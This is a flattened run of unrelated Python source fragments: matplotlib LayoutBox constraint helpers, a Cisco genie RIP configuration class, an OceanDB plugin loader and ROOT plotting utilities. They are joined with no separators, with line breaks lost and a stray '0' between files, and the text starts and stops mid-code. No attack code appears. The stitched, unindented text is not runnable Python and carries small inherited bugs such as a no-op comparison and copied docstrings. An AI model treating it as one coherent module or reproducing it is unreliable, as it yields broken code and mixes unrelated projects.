figBottoms[rowNum2]) figTop = max(figTops[rowNum1], figTops[rowNum2]) figLeft = min(figLefts[colNum1], figLefts[colNum2]) figRight = max(figRights[colNum1], figRights[colNum2]) # These are numbers relative to (0, 0, 1, 1). Need to constrain # relative to parent. width = figRight - figLeft height = figTop - figBottom parent = self.parent cs = [self.left == parent.left + parent.width * figLeft, self.bottom == parent.bottom + parent.height * figBottom, self.width == parent.width * width, self.height == parent.height * height] for c in cs: self.solver.addConstraint(c | 'required') return lb def __repr__(self): return (f'LayoutBox: {self.name:25s}, ' f'(left: {self.left.value():1.3f}) ' f'(bot: {self.bottom.value():1.3f}) ' f'(right: {self.right.value():1.3f}) ' f'(top: {self.top.value():1.3f})') # Utility functions that act on layoutboxes... def hstack(boxes, padding=0, strength='strong'): """ Stack LayoutBox instances from left to right. *padding* is in figure-relative units. """ for i in range(1, len(boxes)): c = (boxes[i-1].right + padding <= boxes[i].left) boxes[i].solver.addConstraint(c | strength) def hpack(boxes, padding=0, strength='strong'): """Stack LayoutBox instances from left to right.""" for i in range(1, len(boxes)): c = (boxes[i-1].right + padding == boxes[i].left) boxes[i].solver.addConstraint(c | strength) def vstack(boxes, padding=0, strength='strong'): """Stack LayoutBox instances from top to bottom.""" for i in range(1, len(boxes)): c = (boxes[i-1].bottom - padding >= boxes[i].top) boxes[i].solver.addConstraint(c | strength) def vpack(boxes, padding=0, strength='strong'): """Stack LayoutBox instances from top to bottom.""" for i in range(1, len(boxes)): c = (boxes[i-1].bottom - padding >= boxes[i].top) boxes[i].solver.addConstraint(c | strength) def match_heights(boxes, height_ratios=None, strength='medium'): """Stack LayoutBox instances from top to bottom.""" if height_ratios is None: height_ratios = np.ones(len(boxes)) for i in range(1, len(boxes)): c = (boxes[i-1].height == boxes[i].height*height_ratios[i-1]/height_ratios[i]) boxes[i].solver.addConstraint(c | strength) def match_widths(boxes, width_ratios=None, strength='medium'): """Stack LayoutBox instances from top to bottom.""" if width_ratios is None: width_ratios = np.ones(len(boxes)) for i in range(1, len(boxes)): c = (boxes[i-1].width == boxes[i].width*width_ratios[i-1]/width_ratios[i]) boxes[i].solver.addConstraint(c | strength) def vstackeq(boxes, padding=0, height_ratios=None): vstack(boxes, padding=padding) match_heights(boxes, height_ratios=height_ratios) def hstackeq(boxes, padding=0, width_ratios=None): hstack(boxes, padding=padding) match_widths(boxes, width_ratios=width_ratios) def align(boxes, attr, strength='strong'): cons = [] for box in boxes[1:]: cons = (getattr(boxes[0], attr) == getattr(box, attr)) boxes[0].solver.addConstraint(cons | strength) def match_top_margins(boxes, levels=1): box0 = boxes[0] top0 = box0 for n in range(levels): top0 = top0.parent for box in boxes[1:]: topb = box for n in range(levels): topb = topb.parent c = (box0.top-top0.top == box.top-topb.top) box0.solver.addConstraint(c | 'strong') def match_bottom_margins(boxes, levels=1): box0 = boxes[0] top0 = box0 for n in range(levels): top0 = top0.parent for box in boxes[1:]: topb = box for n in range(levels): topb = topb.parent c = (box0.bottom-top0.bottom == box.bottom-topb.bottom) box0.solver.addConstraint(c | 'strong') def match_left_margins(boxes, levels=1): box0 = boxes[0] top0 = box0 for n in range(levels): top0 = top0.parent for box in boxes[1:]: topb = box for n in range(levels): topb = topb.parent c = (box0.left-top0.left == box.left-topb.left) box0.solver.addConstraint(c | 'strong') def match_right_margins(boxes, levels=1): box0 = boxes[0] top0 = box0 for n in range(levels): top0 = top0.parent for box in boxes[1:]: topb = box for n in range(levels): topb = topb.parent c = (box0.right-top0.right == box.right-topb.right) box0.solver.addConstraint(c | 'strong') def match_width_margins(boxes, levels=1): match_left_margins(boxes, levels=levels) match_right_margins(boxes, levels=levels) def match_height_margins(boxes, levels=1): match_top_margins(boxes, levels=levels) match_bottom_margins(boxes, levels=levels) def match_margins(boxes, levels=1): match_width_margins(boxes, levels=levels) match_height_margins(boxes, levels=levels) _layoutboxobjnum = itertools.count() def seq_id(): """Generate a short sequential id for layoutbox objects.""" return '%06d' % next(_layoutboxobjnum) def print_children(lb): """Print the children of the layoutbox.""" print(lb) for child in lb.children: print_children(child) def nonetree(lb): """ Make all elements in this tree None, signalling not to do any more layout. """ if lb is not None: if lb.parent is None: # Clear the solver. Hopefully this garbage collects. lb.solver.reset() nonechildren(lb) else: nonetree(lb.parent) def nonechildren(lb): for child in lb.children: nonechildren(child) lb.artist._layoutbox = None lb = None def print_tree(lb): """Print the tree of layoutboxes.""" if lb.parent is None: print('LayoutBox Tree\n') print('==============\n') print_children(lb) print('\n') else: print_tree(lb.parent) def plot_children(fig, box, level=0, printit=True): """Simple plotting to show where boxes are.""" import matplotlib import matplotlib.pyplot as plt if isinstance(fig, matplotlib.figure.Figure): ax = fig.add_axes([0., 0., 1., 1.]) ax.set_facecolor([1., 1., 1., 0.7]) ax.set_alpha(0.3) fig.draw(fig.canvas.get_renderer()) else: ax = fig import matplotlib.patches as patches colors = plt.rcParams["axes.prop_cycle"].by_key()["color"] if printit: print("Level:", level) for child in box.children: if printit: print(child) ax.add_patch( patches.Rectangle( (child.left.value(), child.bottom.value()), # (x, y) child.width.value(), # width child.height.value(), # height fc='none', alpha=0.8, ec=colors[level] ) ) if level > 0: name = child.name.split('.')[-1] if level % 2 == 0: ax.text(child.left.value(), child.bottom.value(), name, size=12-level, color=colors[level]) else: ax.text(child.right.value(), child.top.value(), name, ha='right', va='top', size=12-level, color=colors[level]) plot_children(ax, child, level=level+1, printit=printit) __all__ = ( 'Rip', ) from genie.utils.cisco_collections import typedset from genie.decorator import managedattribute from genie.conf.base import DeviceFeature, LinkFeature, InterfaceFeature import genie.conf.base.attributes from genie.conf.base.attributes import SubAttributes, SubAttributesDict, AttributesHelper from genie.libs.conf.base import Routing from genie.libs.conf.address_family import AddressFamily, AddressFamilySubAttributes from genie.libs.conf.vrf import Vrf, VrfSubAttributes class Rip(Routing, DeviceFeature, LinkFeature, InterfaceFeature): """Rip class `Rip` inherits `Feature' class. The class defines all rip related information and functionalities. Args: Returns: a `Rip` object """ # When adding a rip instance to a link, all the interfaces in this link # needs to be told about the rip object. # this syntax means : all interfaces register_name = {} register_name['interfaces'] = 'rip' instance_id = managedattribute( name='instance_id', read_only=True, # mandatory doc='RIP Instance ID') shutdown = managedattribute( name='shutdown', default=None, type=(None, managedattribute.test_istype(bool))) address_families = managedattribute( name='address_families', finit=typedset(AddressFamily, {AddressFamily.ipv4_unicast}).copy, type=typedset(AddressFamily)._from_iterable) # AddressFamilyAttributes distance = managedattribute( name='distance', default=None, type=(None, managedattribute.test_istype(int))) maximum_paths = managedattribute( name='maximum_paths', default=None, type=(None, managedattribute.test_istype(int))) default_metric = managedattribute( name='default_metric', default=None, type=(None, managedattribute.test_istype(int))) redistribute_lisp_rmap = managedattribute( name='redistribute_lisp_rmap', default=None, type=(None, managedattribute.test_istype(str))) redistribute_direct_rmap = managedattribute( name='redistribute_direct_rmap', default=None, type=(None, managedattribute.test_istype(str))) redistribute_static_rmap = managedattribute( name='redistribute_static_rmap', default=None, type=(None, managedattribute.test_istype(str))) @property def vrfs(self): return \ self.force_vrfs | \ {intf.vrf for intf in self.interfaces} force_vrfs = managedattribute( name='force_vrfs', read_only=True, finit=set, gettype=frozenset) # XXXJST TODO force_vrfs needs to also be accessible per-device. Being read_only, that can't happen def add_force_vrf(self, vrf): assert vrf is None or isinstance(vrf, Vrf) self.force_vrfs # init! self._force_vrfs.add(vrf) def remove_force_vrf(self, vrf): assert vrf is None or isinstance(vrf, Vrf) self.force_vrfs # init! self._force_vrfs.remove(vrf) class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes): """DeviceAttributes class `DeviceAttributes` contains attributes and functionalities that are specific for a device. Args: kwargs (`dict`) : assign attributes to this object while creating it. Returns: a `DeviceAttributes` object """ enabled_feature = managedattribute( name='enabled_feature', default=False, type=managedattribute.test_istype(bool), doc='''Argument to control 'feature rip' CLI''') address_families = managedattribute( name='address_families', type=typedset(AddressFamily)._from_iterable) @address_families.defaulter def address_families(self): return frozenset(self.parent.address_families) @property def vrfs(self): return \ self.force_vrfs | \ {intf.vrf for intf in self.interfaces} def __init__(self, **kwargs): super().__init__(**kwargs) class VrfAttributes(VrfSubAttributes): """ VrfAttributes class `VrfAttributes` inherits from `SubAttributes' class. It contains all vrf related attributes and functionalities. Class contains some powers to access its parent attributes. Args: kwargs (`dict`) : gives the user ability to assign some or all address family attributes while creating the object. """ def __init__(self, **kwargs): super().__init__(**kwargs) address_families = managedattribute( name='address_families', type=typedset(AddressFamily)._from_iterable) @address_families.defaulter def address_families(self): return frozenset(self.parent.address_families) class AddressFamilyAttributes(AddressFamilySubAttributes): """ AddressFamilyAttributes class `AddressFamilyAttributes` inherits from `SubAttributes' class. It contains all address family related attributes and functionalities. Class contains some powers to access its parent attributes. Args: kwargs (`dict`) : gives the user ability to assign some or all address family attributes while creating the object. Class variables: allowed_keys (`List`): list of all allowed 'keys' the object can access. """ allowed_keys = ( AddressFamily.ipv4_unicast, AddressFamily.ipv6_unicast, ) address_family_attr = managedattribute( name='address_family_attr', read_only=True, doc=AddressFamilyAttributes.__doc__) @address_family_attr.initter def address_family_attr(self): return SubAttributesDict(self.AddressFamilyAttributes, parent=self) vrf_attr = managedattribute( name='vrf_attr', read_only=True, doc=VrfAttributes.__doc__) @vrf_attr.initter def vrf_attr(self): return SubAttributesDict(self.VrfAttributes, parent=self) device_attr = managedattribute( name='device_attr', read_only=True, doc=DeviceAttributes.__doc__) @device_attr.initter def device_attr(self): return SubAttributesDict(self.DeviceAttributes, parent=self) def __init__(self, instance_id, **kwargs): '''Rip Base class''' self._instance_id = int(instance_id) super().__init__(**kwargs) def build_config(self, devices=None, apply=True, attributes=None, **kwargs): """method to build the configuration based on attributes Api to build the configuration of an Rip object. This configuration depends of the configurable attributes of this object. If Apply is set to True, then it will apply on the device(s) If it is set to False, then it will return a dictionary. If any kwargs are passed, then the configuration that is built will use those kwargs given, and not the object attributes. This is useful for modifying the configuration, without re-applying everything. Args: apply (`bool`): If True will apply the configuration on the device and if False will return the configuration in a dictionary kwargs (`dict`): If there is kwargs, then it will use those attributes to configure the feature. Otherwise will use the object attributes Return: `str` """ attributes = AttributesHelper(self, attributes) # Get devices if none were passed if devices is None: devices = self.devices # For each device, loop over device_attr cfgs = {} for key, sub, attributes2 in attributes.mapping_items('device_attr', keys=devices): cfgs[key] = sub.build_config(apply=False, attributes=attributes2, **kwargs) if apply: self.testbed.config_on_devices(cfgs, fail_invalid=True) else: # Return configuration return cfgs def build_unconfig(self, devices=None, apply=True, attributes=None, **kwargs): """method to build the unconfiguration based on attributes Api to build the unconfiguration of an Rip object. This configuration depends of the configurable attributes of this object. If Apply is set to True, then it will apply on the device(s) If it is set to False, then it will return a dictionary. If any kwargs are passed, then the configuration that is built will use those kwargs given, and not the object attributes. This is useful for modifying the configuration, without re-applying everything. Args: apply (`bool`): If True will apply the configuration on the device and if False will return the configuration in a dictionary kwargs (`dict`): If there is kwargs, then it will use those attributes to configure the feature. Otherwise will use the object attributes Return: `str` """ attributes = AttributesHelper(self, attributes) # Get devices if none were passed if devices is None: devices = self.devices # For each device, loop over device_attr cfgs = {} for key, sub, attributes2 in attributes.mapping_items('device_attr', keys=devices): cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2, **kwargs) if apply: self.testbed.config_on_devices(cfgs, fail_invalid=True) else: # Return configuration return cfgs 0 import configparser import argparse import importlib.util from oceandb_plugin_system.constants import CONFIG_OPTION from oceandb_plugin_system.exceptions import ConfigError def parse_args(): """Parse command line arguments given to the agent""" parser = argparse.ArgumentParser(description="OceanDB Plugin System") parser.add_argument('--config', metavar='path', required=False, help='path to the oceandb_plugin_sysyem.ini file') try: args = parser.parse_args() return args except: pass def parse_config(file_path='../config/oceandb_plugin_system.ini'): """Loads the configuration file given as parameter""" config_parser = configparser.ConfigParser() config_parser.read(file_path) plugin_config = {} options = config_parser.options(CONFIG_OPTION) for option in options: try: plugin_config[option] = config_parser.get(CONFIG_OPTION, option) if plugin_config[option] == -1: print("skip: %s" % option) except: print("exception on %s!" % option) plugin_config[option] = None return plugin_config def start_plugin(): """This function initialize the Ocean plugin""" try: args = parse_args() if args is not None: if args.config is not None: config = parse_config(args.config) else: config = parse_config() else: config = parse_config() except: raise ConfigError("You should provide a valid config.") plugin_instance = load_plugin(config) return plugin_instance(config) def load_plugin(config): module = config['module'] module_path = "../plugins/%s/plugin.py" % module spec = importlib.util.spec_from_file_location("plugin.py", module_path) foo = importlib.util.module_from_spec(spec) spec.loader.exec_module(foo) return foo.Plugin def print_help(): """Print the default help in stdout""" pass import os import sys import tutils as tu import ROOT import draw_utils as du from array import array gDebug = False #needs a fix: the import below depends on where the module is... from dbgu import debug_utils as dbgu import pcanvas import pyutils from eval_string import get_value def check_andor_make_output_dir(sname, isfilename=False): sdir = sname if isfilename: sdir = os.path.dirname(sname) if len(sdir) == 0: sdir = './' if os.path.isdir(sdir) is False: try: os.makedirs(sdir) except: return False return os.path.isdir(sdir) class debugable(object): def __init__(self): pass def debug(self, msg): global gDebug if gDebug is True: print('[d]', msg) class style_iterator(debugable): good_colors = [-1, 2, 1, 9, 6, 32, 49, 40, 8, 43, 46, 39, 28, 38, 21, 22, 23, 2, 1, 9, 6, 32, 49, 40, 8, 43, 46, 39, 28, 38, 21, 22, 23] good_markers = [-1, 20, 24, 21, 25, 33, 27, 28, 34, 29, 30, 20, 24, 21, 25, 27, 33, 28, 34, 29, 30, 20, 24, 21, 25, 33, 27, 28, 34, 29, 30, 20, 24, 21, 25, 27, 33, 28, 34, 29, 30] # good_lines = [ -1, 1, 2, 3, 5, 8, 6, 7, 4, 9, 10] good_lines = [-1, 1, 2, 3, 5, 7, 9, 6, 8, 4, 10, 1, 2, 3, 5, 7, 9, 6, 8, 4, 10, 1, 2, 3, 5, 7, 9, 6, 8, 4, 10, 1, 2, 3, 5, 7, 9, 6, 8, 4, 10] def __init__(self, reset_idx=0): self.reset_index = reset_idx self.reset() def reset_to_index(self, idx): self.reset_index = idx def reset(self): self.color_idx = self.reset_index self.line_idx = self.reset_index self.marker_idx = self.reset_index self.line_width = 2 def colorize(self, force_color=None): self.color_idx = 0 for o in self.l: icol = force_color if icol is None: icol = self.next_color() o.SetLineColor(icol) def lineize(self, force_line=None): self.line_idx = 0 for o in self.l: imark = force_line if imark is None: imark = self.next_line() o.SetLineStyle(imark) o.SetLineColor(1) o.SetLineWidth(self.line_width) self.debug('::lineize set line style {} for {}'.format(imark, o.GetName())) def markerize(self, force_marker=None): self.marker_idx = 0 scale = 1. for o in self.l: imark = self.next_marker() o.SetMarkerStyle(imark) if imark >= 27: scale = 1.3 o.SetMarkerSize(self.marker_size * scale) o.SetMarkerColor(o.GetLineColor()) def next_color(self): self.color_idx = self.color_idx + 1 if self.color_idx >= len(self.good_colors): self.color_idx = 0 return self.good_colors[self.color_idx] def next_marker(self): self.marker_idx = self.marker_idx + 1 if self.marker_idx >= len(self.good_markers): self.marker_idx = 0 return self.good_markers[self.marker_idx] def next_line(self): self.line_idx = self.line_idx + 1 if self.line_idx >= len(self.good_lines): self.line_idx = 0 return self.good_lines[self.line_idx] def __next__(self): self.next_color() self.next_marker() self.next_line() class draw_option(debugable): def __init__(self, stro=''): self.s = stro.lower() self.strip = self.s self.debug('::draw_option with {}'.format(self.s)) self.lstyle = self.get_style_from_opt('l') self.pstyle = self.get_style_from_opt('p') self.fstyle = self.get_style_from_opt('f') self.kolor = self.get_style_from_opt('k') self.alpha = self.get_style_from_opt('a') # alpha for fill self.lwidth = self.get_style_from_opt('w') self.shift = self.get_number_from_opt('s') if self.lwidth == 0: self.lwidth = 2 self.psize = self.get_style_from_opt('m') if self.psize == 0: self.psize = 0.9 else: self.psize = self.psize / 100. self.use_line = self.check_use_line() self.use_line_legend = self.check_use_line_legend() self.bw = self.check_black_white() self.use_marker = self.check_use_marker() self.is_error = self.has(['serror'], strip=True) self.no_legend = self.has(['noleg'], strip=True) self.hidden = self.has(['hidden'], strip=True) self.rectangle = self.has(['rect'], strip=True) self.overlay = self.has(['over'], strip=True) #ignore 2D canvas splits self.last_kolor = self.has(['-k']) self.last_line = self.has(['-l']) self.smooth = self.has(['smooth'], strip=True) self.is_time_x = self.has(['timex'], strip=True) self.is_time_y = self.has(['timey'], strip=True) def stripped(self): return self.strip def check_black_white(self): return self.has(['bw']) def check_use_line(self): marks = ['hist', 'l', 'c'] return self.has(marks) def check_use_line_legend(self): marks = ['-'] return not self.has(marks) def check_use_marker(self): marks = ['p'] return self.has(marks) def legend_option(self): ret = '' if self.no_legend: return ret if self.use_marker: ret = ret + ' p ' if self.use_line or self.use_line_legend: ret = ret + ' l ' if self.is_error: ret = ret + ' f ' if self.fstyle != 0: ret = ret + ' f ' return ret def has(self, lst, strip=False): ret = False for e in lst: # for s in self.s.split(' '): for s in self.strip.split(' '): if e == s[:len(e)]: ret = True if strip is True: self.strip = self.strip.replace(e, '') return ret def get_style_from_opt(self, what): # what can be l or p or f ts = self.s.split('+') # self.debug('::get_style_from_opt ' + str(ts)) val = 0 for t in ts: tt = t.split(' ')[0] if len(tt) <= 0: continue if what in tt[0]: try: nt = tt[1:] val = int(nt) except: pass self.debug('::get_style_from_opt on {} returning {}'.format(what, val)) self.strip = self.strip.replace('+{}{}'.format(what, str(val)), '') return val def get_number_from_opt(self, what): ts = self.s.split('+' + what) if len(ts) < 2: return 0.0 snum = ts[1].split(' ') fnum = 0.0 try: fnum = get_value(snum[0], float, 0.0) except: fnum = 0.0 self.strip = self.strip.replace('+{}{}'.format(what, str(snum[0])), '') return fnum def random_string(prefix='', ns=30): import random import string lst = [random.choice(string.ascii_letters + string.digits) for n in range(ns)] return str(prefix) + ''.join(lst) class draw_object(debugable): def __init__(self, robj, name=None, new_title=None, dopts=''): self.name = name if self.name is None: self.name = '{}_{}'.format(robj.GetName(), random_string()) self.obj = robj.Clone(self.name) if self.obj.InheritsFrom('TH1'): self.obj.SetDirectory(0) if new_title: self.user_title = new_title if self.obj.InheritsFrom('TF1'): pass else: self.obj.SetTitle(new_title) if self.obj.GetTitle() == '': if self.obj.InheritsFrom('TF1'): pass else: self.obj.SetTitle(self.name) self.user_title = self.name self.dopt = draw_option(dopts) self.is_first = False self.exec = [] def draw(self, extra_opt=''): sdopt = self.dopt.stripped() + ' ' + extra_opt if 'draw!' in extra_opt.lower(): sdopt = extra_opt if self.is_first is True: if self.obj.InheritsFrom('TGraph'): sdopt = sdopt + ' A' self.debug('doption=' + sdopt) if self.dopt.is_time_x: self.obj.GetXaxis().SetTimeDisplay(1) if self.dopt.is_time_y: self.obj.GetYaxis().SetTimeDisplay(1) self.obj.Draw(sdopt) else: self.obj.Draw(sdopt + ' same') class dlist(debugable): enable_eps = False def __init__(self, name='hl'): self.name = name self.title = name self.l = [] self.style = style_iterator() self.maxy = 1e6 # was 1 self.miny = -1e6 # was 0 self.maxz = None # was 1 self.minz = None # was 0 self.max_adjusted = False self.axis_title_offset = [5, 5, 5] # [1.4, 1.4, 1.4] self.axis_title_size = [12, 12, 12] # [0.05, 0.05, 0.05] self.axis_label_size = [12, 12, 12] # for font 42 [0.04, 0.04, 0.04] self.axis_label_offset = [0.02, 0.02, 0.02] self.font = 42 self.pattern = None self.tcanvas = None self.minx = None self.maxx = None self.pad_name = None # pad where last drawn self.pad = None # pad where last drawn self.set_font(42) self.force_legend = False # by default no legends on 2D plots def set_font(self, fn=42, scale=1.): self.font = fn if self.font == 42: self.axis_title_offset = [1.40, 1.45, 1.0] # y offset was 1.40 then 1.45 self.axis_title_size = [0.05 * scale, 0.05 * scale, 0.05 * scale] self.axis_label_size = [0.04 * scale, 0.04 * scale, 0.04 * scale] self.axis_label_offset = [0.02, 0.02, 0.02] if self.font == 43: self.axis_title_offset = [ 3, 3, 2] #[1.4, 1.4, 1.4] self.axis_label_offset = [ 0.01, 0.01, 0.01] self.axis_title_size = [12 * scale, 12 * scale, 12 * scale] #[0.05, 0.05, 0.05] self.axis_label_size = [12 * scale, 12 * scale, 12 * scale] # for font 42 [0.04, 0.04, 0.04] def __getitem__(self, i): return self.l[i] def __len__(self): return len(self.l) def __str__(self): ret = [] ret.append('[i] dlist named: {} titled: {}'.format(self.name, self.title)) for i,item in enumerate(self.l): o = item.obj ret.append(' {} {} {} {}'.format(i, o.IsA().GetName(), o.GetName(), o.GetTitle())) return '\n'.join(ret) def copy_list(self, l=[]): for h in l: self.add(h) def copy(self, l): for h in l.l: self.add(h.obj, h.obj.GetTitle(), h.dopt.s) def last(self): if len(self.l) > 0: return self.l[-1] return None def last_index(self): return len(self.l)-1 def is_selected(self, o): if self.pattern != None: if not self.pattern in o.name: return False return True def _check_name(self, name): for o in self.l: if o.name == name: return True return False def get_by_name(self, name): for l in self.l: if l.name == name: return l return None def find_miny(self, low=None, logy=False): miny = 1e18 for h in self.l: if h.obj.InheritsFrom('TH1'): for nb in range(1, h.obj.GetNbinsX()): c = h.obj.GetBinContent(nb) if logy == False: if c!=0 and c <= miny: miny = c else: if c > 0 and c <= miny: miny = c if h.obj.InheritsFrom('TGraph'): for idx in range(h.obj.GetN()): v = h.obj.GetY()[idx] if logy == False: if v < miny: miny = v else: if v > 0 and v < miny: miny = v if low!=None: if miny < low: miny == low return miny def find_maxy(self, logy=False): maxy = -1e18 for h in self.l: if h.obj.InheritsFrom('TH1'): for nb in range(1, h.obj.GetNbinsX()): c = h.obj.GetBinContent(nb) if logy == False: if c!=0 and c > maxy: maxy = c else: if c > 0 and c > maxy: maxy = c if h.obj.InheritsFrom('TGraph'): vy = h.obj.GetY() for idx in range(h.obj.GetN()): v = vy[idx] if logy == False: if v > maxy: maxy = v else: if v > 0 and v > maxy: maxy = v return maxy def set_min_max_z(self, minz=None, maxz=None): for h in self.l: if h.obj.InheritsFrom('TH2') or h.obj.InheritsFrom('TF2'): if maxz: h.obj.SetMaximum(maxz) self.maxz = maxz if minz: h.obj.SetMinimum(minz) self.minz = minz else: self.debug('::adjust_maxima z : object not TH2 - no minz or maxz {} {}'.format(h.obj.GetName(), h.obj.GetTitle())) self.max_adjusted = True self.debug('::adjust_maxima z-min: {} z-max {}'.format(self.minz, self.maxz)) def adjust_maxima(self, miny=None, maxy=None, logy=False): if miny!=None: self.miny=miny else: self.miny = self.find_miny(logy=logy) if self.miny < 0: self.miny = self.miny * 1.1 else: self.miny = self.miny * 0.9 if logy==True: self.miny=self.find_miny(logy=logy) * 0.5 # self.miny, miny, maxy, logy if logy==True and self.miny <= 0: miny=self.find_miny(logy=logy) self.miny = miny if maxy!=None: self.maxy=maxy else: self.maxy=self.find_maxy() * 1.1 if logy==True: self.maxy=self.find_maxy() * 2. for h in self.l: if self.miny!=None: h.obj.SetMinimum(self.miny) if self.maxy!=None: h.obj.SetMaximum(self.maxy) self.max_adjusted = True self.debug('::adjust_maxima min: {} max {}'.format(self.miny, self.maxy)) def append(self, obj=ROOT.TObject, new_title = '', draw_opt = '', prep=False): newname_root = obj.GetName() + '_' + self.name.replace(' ', '_') newname = newname_root if ' name=' in new_title: splits = new_title.split(' name=') new_title = splits[0] newname = splits[1] newname = pyutils.to_file_name(newname) count = 1 while self._check_name(newname) == True: newname = newname_root + '_' + str(count) count = count + 1 if new_title == '': new_title = obj.GetTitle() if new_title[0] == '+': new_title = obj.GetTitle() + new_title[1:] o = draw_object(obj, newname, new_title, draw_opt) if prep == True: for oi in self.l: oi.is_first = False if len(self.l) == 0 or prep == True: o.is_first = True if prep == True: self.l.insert(0, o) else: self.l.append(o) self.debug('::append ' + o.name + ' ' + o.dopt.s + 'prepend:' + str(prep) ) return o def add_from_file(self, hname = '', fname = '', new_title = '', draw_opt = ''): fn, fext = os.path.splitext(hname) if fext == '.root': if os.path.isfile(hname) and not os.path.isfile(fname): print('[w] correcting possible swap between hname({}) and fname({}) args...'.format(hname, fname)) stmp = hname hname = fname fname = stmp cobj = None f = ROOT.TFile(fname) if f: h = f.Get(hname) if h: cobj = self.add(h, new_title, draw_opt) f.Close() else: f.Close() try: cobj = self.add_from_hashlist(hname, fname, new_title, draw_opt) except: pass if cobj: pass else: try: cobj = self.add_from_tfiledirectory(hname, fname, new_title, draw_opt) except: pass return cobj def add_from_hashlist(self, hname = '', fname = '', new_title = '', draw_opt = ''): cobj = None f = ROOT.TFile(fname) if f: splits = hname.split('/') #print splits[0], splits[1] hlist = f.Get(splits[0]) h = hlist.FindObject(splits[1]) if h: cobj = self.add(h, new_title, draw_opt) f.Close() return cobj def add_from_tfiledirectory(self, hname = '', fname = '', new_title = '', draw_opt = ''): cobj = None f = ROOT.TFile(fname) if f: splits = hname.split('/') #print splits[0], splits[1] hlist = f.Get(splits[0]) h = hlist.Get(splits[1]) print('[i] getting h',h,'from',splits[0],splits[1]) if h: cobj = self.add(h, new_title, draw_opt) f.Close() return cobj def add(self, obj=ROOT.TObject, new_title = '', draw_opt = '', prep=False): if obj == None: return None cobj = None try: robj = obj.obj except: robj = obj if 'smooth' in draw_opt: if robj.InheritsFrom('TH1') or robj.InheritsFrom('TF2'): _robj = robj.Clone('{}_smoothed'.format(robj.GetName())) _robj.Smooth() robj = _robj if robj.InheritsFrom('TH2') or robj.InheritsFrom('TF2'): xprof_new_title = new_title xprof_dopt="p e1 +k6 +m70 +p20" if '+xprof' in draw_opt or '+xprof' in new_title: if '+xprof[' in draw_opt: xprof_dopt = draw_opt.split('+xprof[')[1].split(']')[0] + ' over' draw_opt = draw_opt.replace('+xprof[{}]'.format(xprof_dopt), '') if '+xprof[' in new_title: xprof_new_title = new_title.split('+xprof[')[1].split(']')[0] new_title = new_title.replace('+xprof[{}]'.format(xprof_new_title), '') yprof_drop_zero_entries = False yprof_new_title = new_title yprof_dopt="p e1 +k6 +m70 +p25" if '+yprof' in draw_opt or '+yprof' in new_title: if '+yprof[' in draw_opt: yprof_dopt = draw_opt.split('+yprof[')[1].split(']')[0] + ' over' draw_opt = draw_opt.replace('+yprof[{}]'.format(yprof_dopt), '') yprof_drop_zero_entries = ('-0' in yprof_dopt) if yprof_drop_zero_entries: yprof_dopt = yprof_dopt.replace('-0', '') if '+yprof[' in new_title: yprof_new_title = new_title.split('+yprof[')[1].split(']')[0] new_title = new_title.replace('+yprof[{}]'.format(yprof_new_title), '') cobj = self.append(robj, new_title, draw_opt) if '+xprof' in draw_opt: hprofx = robj.ProfileX() cobj_px = self.append(hprofx, xprof_new_title, xprof_dopt) if '+yprof' in draw_opt: _hprofy = robj.ProfileY() hprofy = h_to_graph(_hprofy, drop_zero_entries=yprof_drop_zero_entries, xerror=True, transpose=True) cobj_py = self.append(hprofy, yprof_new_title, yprof_dopt) return cobj if robj.InheritsFrom("TH1") \ or robj.InheritsFrom("TGraph") \ or robj.InheritsFrom("TF1"): #h = ROOT.TH1(obj) if draw_opt == '': draw_opt = 'hist' if robj.InheritsFrom("TF1"): draw_opt = 'l' if 'ex0' in draw_opt.split(' '): draw_opt = draw_opt.replace('ex0', '') xerror = False else: xerror = True if robj.InheritsFrom('TH1') and 'graph' in draw_opt.split(' '): y_min = True y_min_test = draw_opt.split('ymin') if len(y_min_test) > 1: y_min_test = y_min_test[1].split(' ')[0] y_min = get_value(y_min_test, float, 0.0) robj = h_to_graph(robj, drop_zero_entries=y_min, xerror=xerror) if 'no_y_error' in draw_opt.split(' '): scale_graph_errors(robj, 1, 0.0) draw_opt = draw_opt.replace('no_y_error',' ') if 'no_x_error' in draw_opt.split(' '): scale_graph_errors(robj, 0, 0.0) draw_opt = draw_opt.replace('no_x_error',' ') draw_opt = draw_opt.replace('graph',' ') else: if xerror == False: if robj.InheritsFrom('TGraph'): scale_graph_errors(robj, 0, 0.0) cobj = self.append(robj, new_title, draw_opt, prep) if self.maxy < robj.GetMaximum(): self.maxy = robj.GetMaximum() if self.miny < robj.GetMinimum(): self.miny = robj.GetMinimum() return cobj def add_list(self, hl): for l in hl.l: self.add(l.obj, l.obj.GetTitle(), l.dopt.s) def reset_axis_titles(self, xt=None, yt=None, zt=None): for o in self.l: if xt: o.obj.GetXaxis().SetTitle(xt) if yt: o.obj.GetYaxis().SetTitle(yt) if zt: if o.obj.InheritsFrom('TH1'): o.obj.GetZaxis().SetTitle(zt) def fix_x_range(self, xmin, xmax): try: sxmin = '{0:.10f}'.format(xmin) xminf = get_value(sxmin, float, -1.0) except: xminf = -1. try: sxmax = '{0:.10f}'.format(xmax) xmaxf = get_value(sxmax, float, 1.0) except: xmaxf = 1. reset = False for dobj in self.l: if 'zoom_axis_obj' in dobj.name: gr = dobj.obj gr.SetPoint(0, xminf, 0) gr.SetPoint(1, xmaxf, 0) if len(self.l) > 0: gr.GetXaxis().SetTitle(self.l[0].obj.GetYaxis().GetTitle()) gr.GetYaxis().SetTitle(self.l[0].obj.GetXaxis().GetTitle()) reset = True if reset == False: gr = ROOT.TGraph(2) gr.SetPoint(0, xminf, 0) gr.SetPoint(1, xmaxf, 0) if len(self.l) > 0: gr.GetXaxis().SetTitle(self.l[0].obj.GetXaxis().GetTitle()) gr.GetYaxis().SetTitle(self.l[0].obj.GetYaxis().GetTitle()) o = draw_object(gr, 'zoom_axis_obj', 'fake', 'noleg hidden p') self.l.insert(0, o) for oi in self.l: oi.is_first = False self.l[0].is_first = True def find_xlimits(self): xmin = 0 xmax = 0 for o in self.l: h = o.obj if not h.InheritsFrom('TH1'): if xmin > h.GetXaxis().GetXmin(): xmin = h.GetXaxis().GetXmin() if xmax > h.GetXaxis().GetXmax(): xmax = h.GetXaxis().GetXmax() continue for ix in range(1, h.GetNbinsX()+1): if h.GetBinContent(ix) != 0: if xmin > h.GetBinLowEdge(ix): xmin = h.GetBinLowEdge(ix) if xmax < h.GetBinCenter(ix) + h.GetBinWidth(ix): xmax = h.GetBinCenter(ix) + h.GetBinWidth(ix) return [xmin - 